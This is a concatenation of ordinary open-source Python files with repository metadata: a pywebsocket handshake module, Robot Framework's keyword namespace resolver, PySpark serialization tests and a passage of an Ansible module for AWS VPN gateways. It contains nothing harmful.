def escape_values(bfo):
"""
Called by BibFormat in order to check if output of this element
should be escaped.
"""
return 0
|
gpl-2.0
|
jgraham/servo
|
tests/wpt/web-platform-tests/tools/pywebsocket/src/mod_pywebsocket/handshake/__init__.py
|
658
|
4406
|
# Copyright 2011, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""WebSocket opening handshake processor. This class try to apply available
opening handshake processors for each protocol version until a connection is
successfully established.
"""
import logging
from mod_pywebsocket import common
from mod_pywebsocket.handshake import hybi00
from mod_pywebsocket.handshake import hybi
# Export AbortedByUserException, HandshakeException, and VersionException
# symbol from this module.
from mod_pywebsocket.handshake._base import AbortedByUserException
from mod_pywebsocket.handshake._base import HandshakeException
from mod_pywebsocket.handshake._base import VersionException
_LOGGER = logging.getLogger(__name__)
def do_handshake(request, dispatcher, allowDraft75=False, strict=False):
"""Performs WebSocket handshake.
Args:
request: mod_python request.
dispatcher: Dispatcher (dispatch.Dispatcher).
allowDraft75: obsolete argument. ignored.
strict: obsolete argument. ignored.
Handshaker will add attributes such as ws_resource in performing
handshake.
"""
_LOGGER.debug('Client\'s opening handshake resource: %r', request.uri)
# To print mimetools.Message as escaped one-line string, we converts
# headers_in to dict object. Without conversion, if we use %r, it just
# prints the type and address, and if we use %s, it prints the original
# header string as multiple lines.
#
# Both mimetools.Message and MpTable_Type of mod_python can be
# converted to dict.
#
# mimetools.Message.__str__ returns the original header string.
# dict(mimetools.Message object) returns the map from header names to
# header values. While MpTable_Type doesn't have such __str__ but just
# __repr__ which formats itself as well as dictionary object.
_LOGGER.debug(
'Client\'s opening handshake headers: %r', dict(request.headers_in))
handshakers = []
handshakers.append(
('RFC 6455', hybi.Handshaker(request, dispatcher)))
handshakers.append(
('HyBi 00', hybi00.Handshaker(request, dispatcher)))
for name, handshaker in handshakers:
_LOGGER.debug('Trying protocol version %s', name)
try:
handshaker.do_handshake()
_LOGGER.info('Established (%s protocol)', name)
return
except HandshakeException, e:
_LOGGER.debug(
'Failed to complete opening handshake as %s protocol: %r',
name, e)
if e.status:
raise e
except AbortedByUserException, e:
raise
except VersionException, e:
raise
# TODO(toyoshim): Add a test to cover the case all handshakers fail.
raise HandshakeException(
'Failed to complete opening handshake for all available protocols',
status=common.HTTP_STATUS_BAD_REQUEST)
# vi:sts=4 sw=4 et
|
mpl-2.0
|
alexandrul-ci/robotframework
|
src/robot/running/namespace.py
|
2
|
18101
|
# Copyright 2008-2015 Nokia Networks
# Copyright 2016- Robot Framework Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import copy
from itertools import chain
from robot.errors import DataError
from robot.libraries import STDLIBS
from robot.output import LOGGER, Message
from robot.parsing.settings import Library, Variables, Resource
from robot.utils import (eq, find_file, is_string, OrderedDict, printable_name,
seq2str2, RecommendationFinder)
from .usererrorhandler import UserErrorHandler
from .userkeyword import UserLibrary
from .importer import Importer, ImportCache
from .runkwregister import RUN_KW_REGISTER
IMPORTER = Importer()
class Namespace(object):
_default_libraries = ('BuiltIn', 'Reserved', 'Easter')
_library_import_by_path_endings = ('.py', '.java', '.class', '/', os.sep)
def __init__(self, variables, suite, resource):
LOGGER.info("Initializing namespace for test suite '%s'" % suite.longname)
self.variables = variables
self._imports = resource.imports
self._kw_store = KeywordStore(resource)
self._imported_variable_files = ImportCache()
self._suite_name = suite.longname
self._running_test = False
@property
def libraries(self):
return self._kw_store.libraries.values()
def handle_imports(self):
self._import_default_libraries()
self._handle_imports(self._imports)
def _import_default_libraries(self):
for name in self._default_libraries:
self.import_library(name, notify=name == 'BuiltIn')
def _handle_imports(self, import_settings):
for item in import_settings:
try:
if not item.name:
raise DataError('%s setting requires a name' % item.type)
self._import(item)
except DataError as err:
item.report_invalid_syntax(err.message)
def _import(self, import_setting):
action = {'Library': self._import_library,
'Resource': self._import_resource,
'Variables': self._import_variables}[import_setting.type]
action(import_setting)
def import_resource(self, name, overwrite=True):
self._import_resource(Resource(None, name), overwrite=overwrite)
def _import_resource(self, import_setting, overwrite=False):
path = self._resolve_name(import_setting)
self._validate_not_importing_init_file(path)
if overwrite or path not in self._kw_store.resources:
resource = IMPORTER.import_resource(path)
self.variables.set_from_variable_table(resource.variables, overwrite)
user_library = UserLibrary(resource)
self._kw_store.resources[path] = user_library
self._handle_imports(resource.imports)
LOGGER.imported("Resource", user_library.name,
importer=import_setting.source,
source=path)
else:
LOGGER.info("Resource file '%s' already imported by suite '%s'"
% (path, self._suite_name))
def _validate_not_importing_init_file(self, path):
name = os.path.splitext(os.path.basename(path))[0]
if name.lower() == '__init__':
raise DataError("Initialization file '%s' cannot be imported as "
"a resource file." % path)
def import_variables(self, name, args, overwrite=False):
self._import_variables(Variables(None, name, args), overwrite)
def _import_variables(self, import_setting, overwrite=False):
path = self._resolve_name(import_setting)
args = self._resolve_args(import_setting)
if overwrite or (path, args) not in self._imported_variable_files:
self._imported_variable_files.add((path, args))
self.variables.set_from_file(path, args, overwrite)
LOGGER.imported("Variables", os.path.basename(path),
args=list(args),
importer=import_setting.source,
source=path)
else:
msg = "Variable file '%s'" % path
if args:
msg += " with arguments %s" % seq2str2(args)
LOGGER.info("%s already imported by suite '%s'"
% (msg, self._suite_name))
def import_library(self, name, args=None, alias=None, notify=True):
self._import_library(Library(None, name, args=args, alias=alias),
notify=notify)
def _import_library(self, import_setting, notify=True):
name = self._resolve_name(import_setting)
lib = IMPORTER.import_library(name, import_setting.args,
import_setting.alias, self.variables)
if lib.name in self._kw_store.libraries:
LOGGER.info("Test library '%s' already imported by suite '%s'"
% (lib.name, self._suite_name))
return
if notify:
LOGGER.imported("Library", lib.name,
args=list(import_setting.args),
originalname=lib.orig_name,
importer=import_setting.source,
source=lib.source)
self._kw_store.libraries[lib.name] = lib
lib.start_suite()
if self._running_test:
lib.start_test()
def _resolve_name(self, import_setting):
name = import_setting.name
try:
name = self.variables.replace_string(name)
except DataError as err:
self._raise_replacing_vars_failed(import_setting, err)
return self._get_name(name, import_setting)
def _raise_replacing_vars_failed(self, import_setting, err):
raise DataError("Replacing variables from setting '%s' failed: %s"
% (import_setting.type, err.message))
def _get_name(self, name, import_setting):
if import_setting.type == 'Library' and not self._is_library_by_path(name):
if ' ' in name:
# TODO: Remove support for extra spaces in name in RF 3.1.
# https://github.com/robotframework/robotframework/issues/2264
warning = ("Importing library with extra spaces in name like "
"'%s' is deprecated. Remove spaces and use '%s' "
"instead." % (name, name.replace(' ', '')))
import_setting.report_invalid_syntax(warning, 'WARN')
name = name.replace(' ', '')
return name
return find_file(name, import_setting.directory,
file_type=import_setting.type)
def _is_library_by_path(self, path):
return path.lower().endswith(self._library_import_by_path_endings)
def _resolve_args(self, import_setting):
try:
return self.variables.replace_list(import_setting.args)
except DataError as err:
self._raise_replacing_vars_failed(import_setting, err)
def set_search_order(self, new_order):
old_order = self._kw_store.search_order
self._kw_store.search_order = new_order
return old_order
def start_test(self):
self._running_test = True
self.variables.start_test()
for lib in self.libraries:
lib.start_test()
def end_test(self):
self.variables.end_test()
for lib in self.libraries:
lib.end_test()
self._running_test = True
def start_suite(self):
self.variables.start_suite()
def end_suite(self):
self.variables.end_suite()
for lib in self.libraries:
lib.end_suite()
def start_user_keyword(self):
self.variables.start_keyword()
def end_user_keyword(self):
self.variables.end_keyword()
def get_library_instance(self, libname):
return self._kw_store.get_library(libname).get_instance()
def get_library_instances(self):
return dict((name, lib.get_instance())
for name, lib in self._kw_store.libraries.items())
def reload_library(self, libname_or_instance):
library = self._kw_store.get_library(libname_or_instance)
library.reload()
return library
def get_runner(self, name):
try:
return self._kw_store.get_runner(name)
except DataError as err:
return UserErrorHandler(name, err.message)
class KeywordStore(object):
def __init__(self, resource):
self.user_keywords = UserLibrary(resource,
UserLibrary.TEST_CASE_FILE_TYPE)
self.libraries = OrderedDict()
self.resources = ImportCache()
self.search_order = ()
def get_library(self, name_or_instance):
if name_or_instance is None:
raise DataError("Library can not be None.")
if is_string(name_or_instance):
return self._get_lib_by_name(name_or_instance)
return self._get_lib_by_instance(name_or_instance)
def _get_lib_by_name(self, name):
if name in self.libraries:
return self.libraries[name]
matches = [lib for lib in self.libraries.values() if eq(lib.name, name)]
if len(matches) == 1:
return matches[0]
self._no_library_found(name, multiple=bool(matches))
def _no_library_found(self, name, multiple=False):
if multiple:
raise DataError("Multiple libraries matching '%s' found." % name)
raise DataError("No library '%s' found." % name)
def _get_lib_by_instance(self, instance):
for lib in self.libraries.values():
if lib.get_instance(create=False) is instance:
return lib
self._no_library_found(instance)
def get_runner(self, name):
runner = self._get_runner(name)
if runner is None:
self._raise_no_keyword_found(name)
return runner
def _raise_no_keyword_found(self, name):
msg = "No keyword with name '%s' found." % name
finder = KeywordRecommendationFinder(self.user_keywords,
self.libraries,
self.resources)
recommendations = finder.recommend_similar_keywords(name)
msg = finder.format_recommendations(msg, recommendations)
raise DataError(msg)
def _get_runner(self, name):
if not name:
raise DataError('Keyword name cannot be empty.')
if not is_string(name):
raise DataError('Keyword name must be a string.')
runner = self._get_runner_from_test_case_file(name)
if not runner and '.' in name:
runner = self._get_explicit_runner(name)
if not runner:
runner = self._get_implicit_runner(name)
if not runner:
runner = self._get_bdd_style_runner(name)
return runner
def _get_bdd_style_runner(self, name):
for prefix in ['given ', 'when ', 'then ', 'and ', 'but ']:
if name.lower().startswith(prefix):
runner = self._get_runner(name[len(prefix):])
if runner:
runner = copy.copy(runner)
runner.name = name
return runner
return None
def _get_implicit_runner(self, name):
runner = self._get_runner_from_resource_files(name)
if not runner:
runner = self._get_runner_from_libraries(name)
return runner
def _get_runner_from_test_case_file(self, name):
if name in self.user_keywords.handlers:
return self.user_keywords.handlers.create_runner(name)
def _get_runner_from_resource_files(self, name):
found = [lib.handlers.create_runner(name)
for lib in self.resources.values()
if name in lib.handlers]
if not found:
return None
if len(found) > 1:
found = self._get_runner_based_on_search_order(found)
if len(found) == 1:
return found[0]
self._raise_multiple_keywords_found(name, found)
def _get_runner_from_libraries(self, name):
found = [lib.handlers.create_runner(name) for lib in self.libraries.values()
if name in lib.handlers]
if not found:
return None
if len(found) > 1:
found = self._get_runner_based_on_search_order(found)
if len(found) == 2:
found = self._filter_stdlib_runner(*found)
if len(found) == 1:
return found[0]
self._raise_multiple_keywords_found(name, found)
def _get_runner_based_on_search_order(self, runners):
for libname in self.search_order:
for runner in runners:
if eq(libname, runner.libname):
return [runner]
return runners
def _filter_stdlib_runner(self, runner1, runner2):
stdlibs_without_remote = STDLIBS - set(['Remote'])
if runner1.library.orig_name in stdlibs_without_remote:
standard, custom = runner1, runner2
elif runner2.library.orig_name in stdlibs_without_remote:
standard, custom = runner2, runner1
else:
return [runner1, runner2]
if not RUN_KW_REGISTER.is_run_keyword(custom.library.orig_name, custom.name):
self._custom_and_standard_keyword_conflict_warning(custom, standard)
return [custom]
def _custom_and_standard_keyword_conflict_warning(self, custom, standard):
custom_with_name = standard_with_name = ''
if custom.library.name != custom.library.orig_name:
custom_with_name = " imported as '%s'" % custom.library.name
if standard.library.name != standard.library.orig_name:
standard_with_name = " imported as '%s'" % standard.library.name
warning = Message("Keyword '%s' found both from a custom test library "
"'%s'%s and a standard library '%s'%s. The custom "
"keyword is used. To select explicitly, and to get "
"rid of this warning, use either '%s' or '%s'."
% (standard.name,
custom.library.orig_name, custom_with_name,
standard.library.orig_name, standard_with_name,
custom.longname, standard.longname), level='WARN')
if custom.pre_run_messages:
custom.pre_run_messages.append(warning)
else:
custom.pre_run_messages = [warning]
def _get_explicit_runner(self, name):
found = []
for owner_name, kw_name in self._yield_owner_and_kw_names(name):
found.extend(self._find_keywords(owner_name, kw_name))
if len(found) > 1:
self._raise_multiple_keywords_found(name, found, implicit=False)
return found[0] if found else None
def _yield_owner_and_kw_names(self, full_name):
tokens = full_name.split('.')
for i in range(1, len(tokens)):
yield '.'.join(tokens[:i]), '.'.join(tokens[i:])
def _find_keywords(self, owner_name, name):
return [owner.handlers.create_runner(name)
for owner in chain(self.libraries.values(), self.resources.values())
if eq(owner.name, owner_name) and name in owner.handlers]
def _raise_multiple_keywords_found(self, name, found, implicit=True):
error = "Multiple keywords with name '%s' found" % name
if implicit:
error += ". Give the full name of the keyword you want to use"
names = sorted(runner.longname for runner in found)
raise DataError('\n '.join([error+':'] + names))
class KeywordRecommendationFinder(object):
def __init__(self, user_keywords, libraries, resources):
self.user_keywords = user_keywords
self.libraries = libraries
self.resources = resources
def recommend_similar_keywords(self, name):
"""Return keyword names similar to `name`."""
candidates = self._get_candidates('.' in name)
normalizer = lambda name: candidates.get(name, name).lower().replace(
'_', ' ')
finder = RecommendationFinder(normalizer)
return finder.find_recommendations(name, candidates)
@staticmethod
def format_recommendations(msg, recommendations):
return RecommendationFinder.format_recommendations(
msg, recommendations)
def _get_candidates(self, use_full_name):
names = {}
for owner, name in self._get_all_handler_names():
full_name = '%s.%s' % (owner, name) if owner else name
names[full_name] = full_name if use_full_name else name
return names
def _get_all_handler_names(self):
"""Return a list of `(library_name, handler_name)` tuples."""
handlers = [('', printable_name(handler.name, True))
for handler in self.user_keywords.handlers]
for library in chain(self.libraries.values(), self.resources.values()):
if library.name != 'Reserved':
handlers.extend(
((library.name or '',
printable_name(handler.name, code_style=True))
for handler in library.handlers))
# sort handlers to ensure consistent ordering between Jython and Python
return sorted(handlers)
|
apache-2.0
|
zero323/spark
|
python/pyspark/sql/tests/test_serde.py
|
23
|
6188
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import datetime
import shutil
import tempfile
import time
from pyspark.sql import Row
from pyspark.sql.functions import lit
from pyspark.sql.types import StructType, StructField, DecimalType, BinaryType
from pyspark.testing.sqlutils import ReusedSQLTestCase, UTCOffsetTimezone
class SerdeTests(ReusedSQLTestCase):
def test_serialize_nested_array_and_map(self):
d = [Row(l=[Row(a=1, b='s')], d={"key": Row(c=1.0, d="2")})]
rdd = self.sc.parallelize(d)
df = self.spark.createDataFrame(rdd)
row = df.head()
self.assertEqual(1, len(row.l))
self.assertEqual(1, row.l[0].a)
self.assertEqual("2", row.d["key"].d)
l = df.rdd.map(lambda x: x.l).first()
self.assertEqual(1, len(l))
self.assertEqual('s', l[0].b)
d = df.rdd.map(lambda x: x.d).first()
self.assertEqual(1, len(d))
self.assertEqual(1.0, d["key"].c)
row = df.rdd.map(lambda x: x.d["key"]).first()
self.assertEqual(1.0, row.c)
self.assertEqual("2", row.d)
def test_select_null_literal(self):
df = self.spark.sql("select null as col")
self.assertEqual(Row(col=None), df.first())
def test_struct_in_map(self):
d = [Row(m={Row(i=1): Row(s="")})]
df = self.sc.parallelize(d).toDF()
k, v = list(df.head().m.items())[0]
self.assertEqual(1, k.i)
self.assertEqual("", v.s)
def test_filter_with_datetime(self):
time = datetime.datetime(2015, 4, 17, 23, 1, 2, 3000)
date = time.date()
row = Row(date=date, time=time)
df = self.spark.createDataFrame([row])
self.assertEqual(1, df.filter(df.date == date).count())
self.assertEqual(1, df.filter(df.time == time).count())
self.assertEqual(0, df.filter(df.date > date).count())
self.assertEqual(0, df.filter(df.time > time).count())
def test_filter_with_datetime_timezone(self):
dt1 = datetime.datetime(2015, 4, 17, 23, 1, 2, 3000, tzinfo=UTCOffsetTimezone(0))
dt2 = datetime.datetime(2015, 4, 17, 23, 1, 2, 3000, tzinfo=UTCOffsetTimezone(1))
row = Row(date=dt1)
df = self.spark.createDataFrame([row])
self.assertEqual(0, df.filter(df.date == dt2).count())
self.assertEqual(1, df.filter(df.date > dt2).count())
self.assertEqual(0, df.filter(df.date < dt2).count())
def test_time_with_timezone(self):
day = datetime.date.today()
now = datetime.datetime.now()
ts = time.mktime(now.timetuple())
# class in __main__ is not serializable
from pyspark.testing.sqlutils import UTCOffsetTimezone
utc = UTCOffsetTimezone()
utcnow = datetime.datetime.utcfromtimestamp(ts) # without microseconds
# add microseconds to utcnow (keeping year,month,day,hour,minute,second)
utcnow = datetime.datetime(*(utcnow.timetuple()[:6] + (now.microsecond, utc)))
df = self.spark.createDataFrame([(day, now, utcnow)])
day1, now1, utcnow1 = df.first()
self.assertEqual(day1, day)
self.assertEqual(now, now1)
self.assertEqual(now, utcnow1)
# regression test for SPARK-19561
def test_datetime_at_epoch(self):
epoch = datetime.datetime.fromtimestamp(0)
df = self.spark.createDataFrame([Row(date=epoch)])
first = df.select('date', lit(epoch).alias('lit_date')).first()
self.assertEqual(first['date'], epoch)
self.assertEqual(first['lit_date'], epoch)
def test_decimal(self):
from decimal import Decimal
schema = StructType([StructField("decimal", DecimalType(10, 5))])
df = self.spark.createDataFrame([(Decimal("3.14159"),)], schema)
row = df.select(df.decimal + 1).first()
self.assertEqual(row[0], Decimal("4.14159"))
tmpPath = tempfile.mkdtemp()
shutil.rmtree(tmpPath)
df.write.parquet(tmpPath)
df2 = self.spark.read.parquet(tmpPath)
row = df2.first()
self.assertEqual(row[0], Decimal("3.14159"))
def test_BinaryType_serialization(self):
# Pyrolite version <= 4.9 could not serialize BinaryType with Python3 SPARK-17808
# The empty bytearray is test for SPARK-21534.
schema = StructType([StructField('mybytes', BinaryType())])
data = [[bytearray(b'here is my data')],
[bytearray(b'and here is some more')],
[bytearray(b'')]]
df = self.spark.createDataFrame(data, schema=schema)
df.collect()
def test_int_array_serialization(self):
# Note that this test seems dependent on parallelism.
data = self.spark.sparkContext.parallelize([[1, 2, 3, 4]] * 100, numSlices=12)
df = self.spark.createDataFrame(data, "array<integer>")
self.assertEqual(len(list(filter(lambda r: None in r.value, df.collect()))), 0)
def test_bytes_as_binary_type(self):
df = self.spark.createDataFrame([[b"abcd"]], "col binary")
self.assertEqual(df.first().col, bytearray(b'abcd'))
if __name__ == "__main__":
import unittest
from pyspark.sql.tests.test_serde import * # noqa: F401
try:
import xmlrunner # type: ignore[import]
testRunner = xmlrunner.XMLTestRunner(output='target/test-reports', verbosity=2)
except ImportError:
testRunner = None
unittest.main(testRunner=testRunner, verbosity=2)
|
apache-2.0
|
PriceChild/ansible
|
lib/ansible/modules/cloud/amazon/ec2_vpc_vgw.py
|
69
|
20312
|
#!/usr/bin/python
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['stableinterface'],
'supported_by': 'curated'}
DOCUMENTATION = '''
module: ec2_vpc_vgw
short_description: Create and delete AWS VPN Virtual Gateways.
description:
- Creates AWS VPN Virtual Gateways
- Deletes AWS VPN Virtual Gateways
- Attaches Virtual Gateways to VPCs
- Detaches Virtual Gateways from VPCs
version_added: "2.2"
requirements: [ boto3 ]
options:
state:
description:
- present to ensure resource is created.
- absent to remove resource
required: false
default: present
choices: [ "present", "absent"]
name:
description:
- name of the vgw to be created or deleted
required: false
type:
description:
- type of the virtual gateway to be created
required: false
choices: [ "ipsec.1" ]
vpn_gateway_id:
description:
- vpn gateway id of an existing virtual gateway
required: false
vpc_id:
description:
- the vpc-id of a vpc to attach or detach
required: false
wait_timeout:
description:
- number of seconds to wait for status during vpc attach and detach
required: false
default: 320
tags:
description:
- dictionary of resource tags
required: false
default: null
aliases: [ "resource_tags" ]
author: Nick Aslanidis (@naslanidis)
extends_documentation_fragment:
- aws
- ec2
'''
EXAMPLES = '''
- name: Create a new vgw attached to a specific VPC
ec2_vpc_vgw:
state: present
region: ap-southeast-2
profile: personal
vpc_id: vpc-12345678
name: personal-testing
type: ipsec.1
register: created_vgw
- name: Create a new unattached vgw
ec2_vpc_vgw:
state: present
region: ap-southeast-2
profile: personal
name: personal-testing
type: ipsec.1
tags:
environment: production
owner: ABC
register: created_vgw
- name: Remove a new vgw using the name
ec2_vpc_vgw:
state: absent
region: ap-southeast-2
profile: personal
name: personal-testing
type: ipsec.1
register: deleted_vgw
- name: Remove a new vgw using the vpn_gateway_id
ec2_vpc_vgw:
state: absent
region: ap-southeast-2
profile: personal
vpn_gateway_id: vgw-3a9aa123
register: deleted_vgw
'''
RETURN = '''
result:
description: The result of the create, or delete action.
returned: success
type: dictionary
'''
try:
import json
import time
import botocore
import boto3
HAS_BOTO3 = True
except ImportError:
HAS_BOTO3 = False
def get_vgw_info(vgws):
if not isinstance(vgws, list):
return
for vgw in vgws:
vgw_info = {
'id': vgw['VpnGatewayId'],
'type': vgw['Type'],
'state': vgw['State'],
'vpc_id': None,
'tags': dict()
}
for tag in vgw['Tags']:
vgw_info['tags'][tag['Key']] = tag['Value']
if len(vgw['VpcAttachments']) != 0 and vgw['VpcAttachments'][0]['State'] == 'attached':
vgw_info['vpc_id'] = vgw['VpcAttachments'][0]['VpcId']
return vgw_info
def wait_for_status(client, module, vpn_gateway_id, status):
polling_increment_secs = 15
max_retries = (module.params.get('wait_timeout') / polling_increment_secs)
status_achieved = False
for x in range(0, max_retries):
try:
response = find_vgw(client, module, vpn_gateway_id)
if response[0]['VpcAttachments'][0]['State'] == status:
status_achieved = True
break
else:
time.sleep(polling_increment_secs)
except botocore.exceptions.ClientError:
e = get_exception()
module.fail_json(msg=str(e))
result = response
return status_achieved, result
def attach_vgw(client, module, vpn_gateway_id):
params = dict()
params['VpcId'] = module.params.get('vpc_id')
try:
response = client.attach_vpn_gateway(VpnGatewayId=vpn_gateway_id, VpcId=params['VpcId'])
except botocore.exceptions.ClientError:
e = get_exception()
module.fail_json(msg=str(e))
status_achieved, vgw = wait_for_status(client, module, [vpn_gateway_id], 'attached')
if not status_achieved:
module.fail_json(msg='Error waiting for vpc to attach to vgw - please check the AWS console')
result = response
return result
def detach_vgw(client, module, vpn_gateway_id, vpc_id=None):
params = dict()
params['VpcId'] = module.params.get('vpc_id')
if vpc_id:
try:
response = client.detach_vpn_gateway(VpnGatewayId=vpn_gateway_id, VpcId=vpc_id)
except botocore.exceptions.ClientError:
e = get_exception()
module.fail_json(msg=str(e))
else:
try:
response = client.detach_vpn_gateway(VpnGatewayId=vpn_gateway_id, VpcId=params['VpcId'])
except botocore.exceptions.ClientError:
e = get_exception()
module.fail_json(msg=str(e))
status_achieved, vgw = wait_for_status(client, module, [vpn_gateway_id], 'detached')
if not status_achieved:
module.fail_json(msg='Error waiting for vpc to detach from vgw - please check the AWS console')
result = response
return result
def create_vgw(client, module):
params = dict()
params['Type'] = module.params.get('type')
try:
response = client.create_vpn_gateway(Type=params['Type'])
except botocore.exceptions.ClientError:
e = get_exception()
module.fail_json(msg=str(e))
result = response
return result
def delete_vgw(client, module, vpn_gateway_id):
try:
response = client.delete_vpn_gateway(VpnGatewayId=vpn_gateway_id)
except botocore.exceptions.ClientError:
e = get_exception()
module.fail_json(msg=str(e))
#return the deleted VpnGatewayId as this is not included in the above response
result = vpn_gateway_id
return result
def create_tags(client, module, vpn_gateway_id):
params = dict()
try:
response = client.create_tags(Resources=[vpn_gateway_id],Tags=load_tags(module))
except botocore.exceptions.ClientError:
e = get_exception()
module.fail_json(msg=str(e))
result = response
return result
def delete_tags(client, module, vpn_gateway_id, tags_to_delete=None):
params = dict()
if tags_to_delete:
try:
response = client.delete_tags(Resources=[vpn_gateway_id], Tags=tags_to_delete)
except botocore.exceptions.ClientError:
e = get_exception()
module.fail_json(msg=str(e))
else:
try:
response = client.delete_tags(Resources=[vpn_gateway_id])
except botocore.exceptions.ClientError:
e = get_exception()
module.fail_json(msg=str(e))
result = response
return result
def load_tags(module):
tags = []
if module.params.get('tags'):
for name, value in module.params.get('tags').items():
tags.append({'Key': name, 'Value': str(value)})
tags.append({'Key': "Name", 'Value': module.params.get('name')})
else:
tags.append({'Key': "Name", 'Value': module.params.get('name')})
return tags
def find_tags(client, module, resource_id=None):
if resource_id:
try:
response = client.describe_tags(Filters=[
{'Name': 'resource-id', 'Values': [resource_id]}
])
except botocore.exceptions.ClientError:
e = get_exception()
module.fail_json(msg=str(e))
result = response
return result
def check_tags(client, module, existing_vgw, vpn_gateway_id):
params = dict()
params['Tags'] = module.params.get('tags')
vgw = existing_vgw
changed = False
tags_list = {}
#format tags for comparison
for tags in existing_vgw[0]['Tags']:
if tags['Key'] != 'Name':
tags_list[tags['Key']] = tags['Value']
# if existing tags don't match the tags arg, delete existing and recreate with new list
if params['Tags'] is not None and tags_list != params['Tags']:
delete_tags(client, module, vpn_gateway_id)
create_tags(client, module, vpn_gateway_id)
vgw = find_vgw(client, module)
changed = True
#if no tag args are supplied, delete any existing tags with the exception of the name tag
if params['Tags'] is None and tags_list != {}:
tags_to_delete = []
for tags in existing_vgw[0]['Tags']:
if tags['Key'] != 'Name':
tags_to_delete.append(tags)
delete_tags(client, module, vpn_gateway_id, tags_to_delete)
vgw = find_vgw(client, module)
changed = True
return vgw, changed
def find_vpc(client, module):
params = dict()
params['vpc_id'] = module.params.get('vpc_id')
if params['vpc_id']:
try:
response = client.describe_vpcs(VpcIds=[params['vpc_id']])
except botocore.exceptions.ClientError:
e = get_exception()
module.fail_json(msg=str(e))
result = response
return result
def find_vgw(client, module, vpn_gateway_id=None):
params = dict()
params['Name'] = module.params.get('name')
params['Type'] = module.params.get('type')
params['State'] = module.params.get('state')
if params['State'] == 'present':
try:
response = client.describe_vpn_gateways(Filters=[
{'Name': 'type', 'Values': [params['Type']]},
{'Name': 'tag:Name', 'Values': [params['Name']]}
])
except botocore.exceptions.ClientError:
e = get_exception()
module.fail_json(msg=str(e))
else:
if vpn_gateway_id:
try:
response = client.describe_vpn_gateways(VpnGatewayIds=vpn_gateway_id)
except botocore.exceptions.ClientError:
e = get_exception()
module.fail_json(msg=str(e))
else:
try:
response = client.describe_vpn_gateways(Filters=[
{'Name': 'type', 'Values': [params['Type']]},
{'Name': 'tag:Name', 'Values': [params['Name']]}
])
except botocore.exceptions.ClientError:
e = get_exception()
module.fail_json(msg=str(e))
result = response['VpnGateways']
return result
def ensure_vgw_present(client, module):
# If an existing vgw name and type matches our args, then a match is considered to have been
# found and we will not create another vgw.
changed = False
params = dict()
result = dict()
params['Name'] = module.params.get('name')
params['VpcId'] = module.params.get('vpc_id')
params['Type'] = module.params.get('type')
params['Tags'] = module.params.get('tags')
params['VpnGatewayIds'] = module.params.get('vpn_gateway_id')
# Check that a name argument has been supplied.
if not module.params.get('name'):
module.fail_json(msg='A name is required when a status of \'present\' is suppled')
# check if a gateway matching our module args already exists
existing_vgw = find_vgw(client, module)
if existing_vgw != [] and existing_vgw[0]['State'] != 'deleted':
vpn_gateway_id = existing_vgw[0]['VpnGatewayId']
vgw, changed = check_tags(client, module, existing_vgw, vpn_gateway_id)
# if a vpc_id was provided, check if it exists and if it's attached
if params['VpcId']:
# check that the vpc_id exists. If not, an exception is thrown
vpc = find_vpc(client, module)
current_vpc_attachments = existing_vgw[0]['VpcAttachments']
if current_vpc_attachments != [] and current_vpc_attachments[0]['State'] == 'attached':
if current_vpc_attachments[0]['VpcId'] == params['VpcId'] and current_vpc_attachments[0]['State'] == 'attached':
changed = False
else:
# detach the existing vpc from the virtual gateway
vpc_to_detach = current_vpc_attachments[0]['VpcId']
detach_vgw(client, module, vpn_gateway_id, vpc_to_detach)
time.sleep(5)
attached_vgw = attach_vgw(client, module, vpn_gateway_id)
vgw = find_vgw(client, module, [vpn_gateway_id])
changed = True
else:
# attach the vgw to the supplied vpc
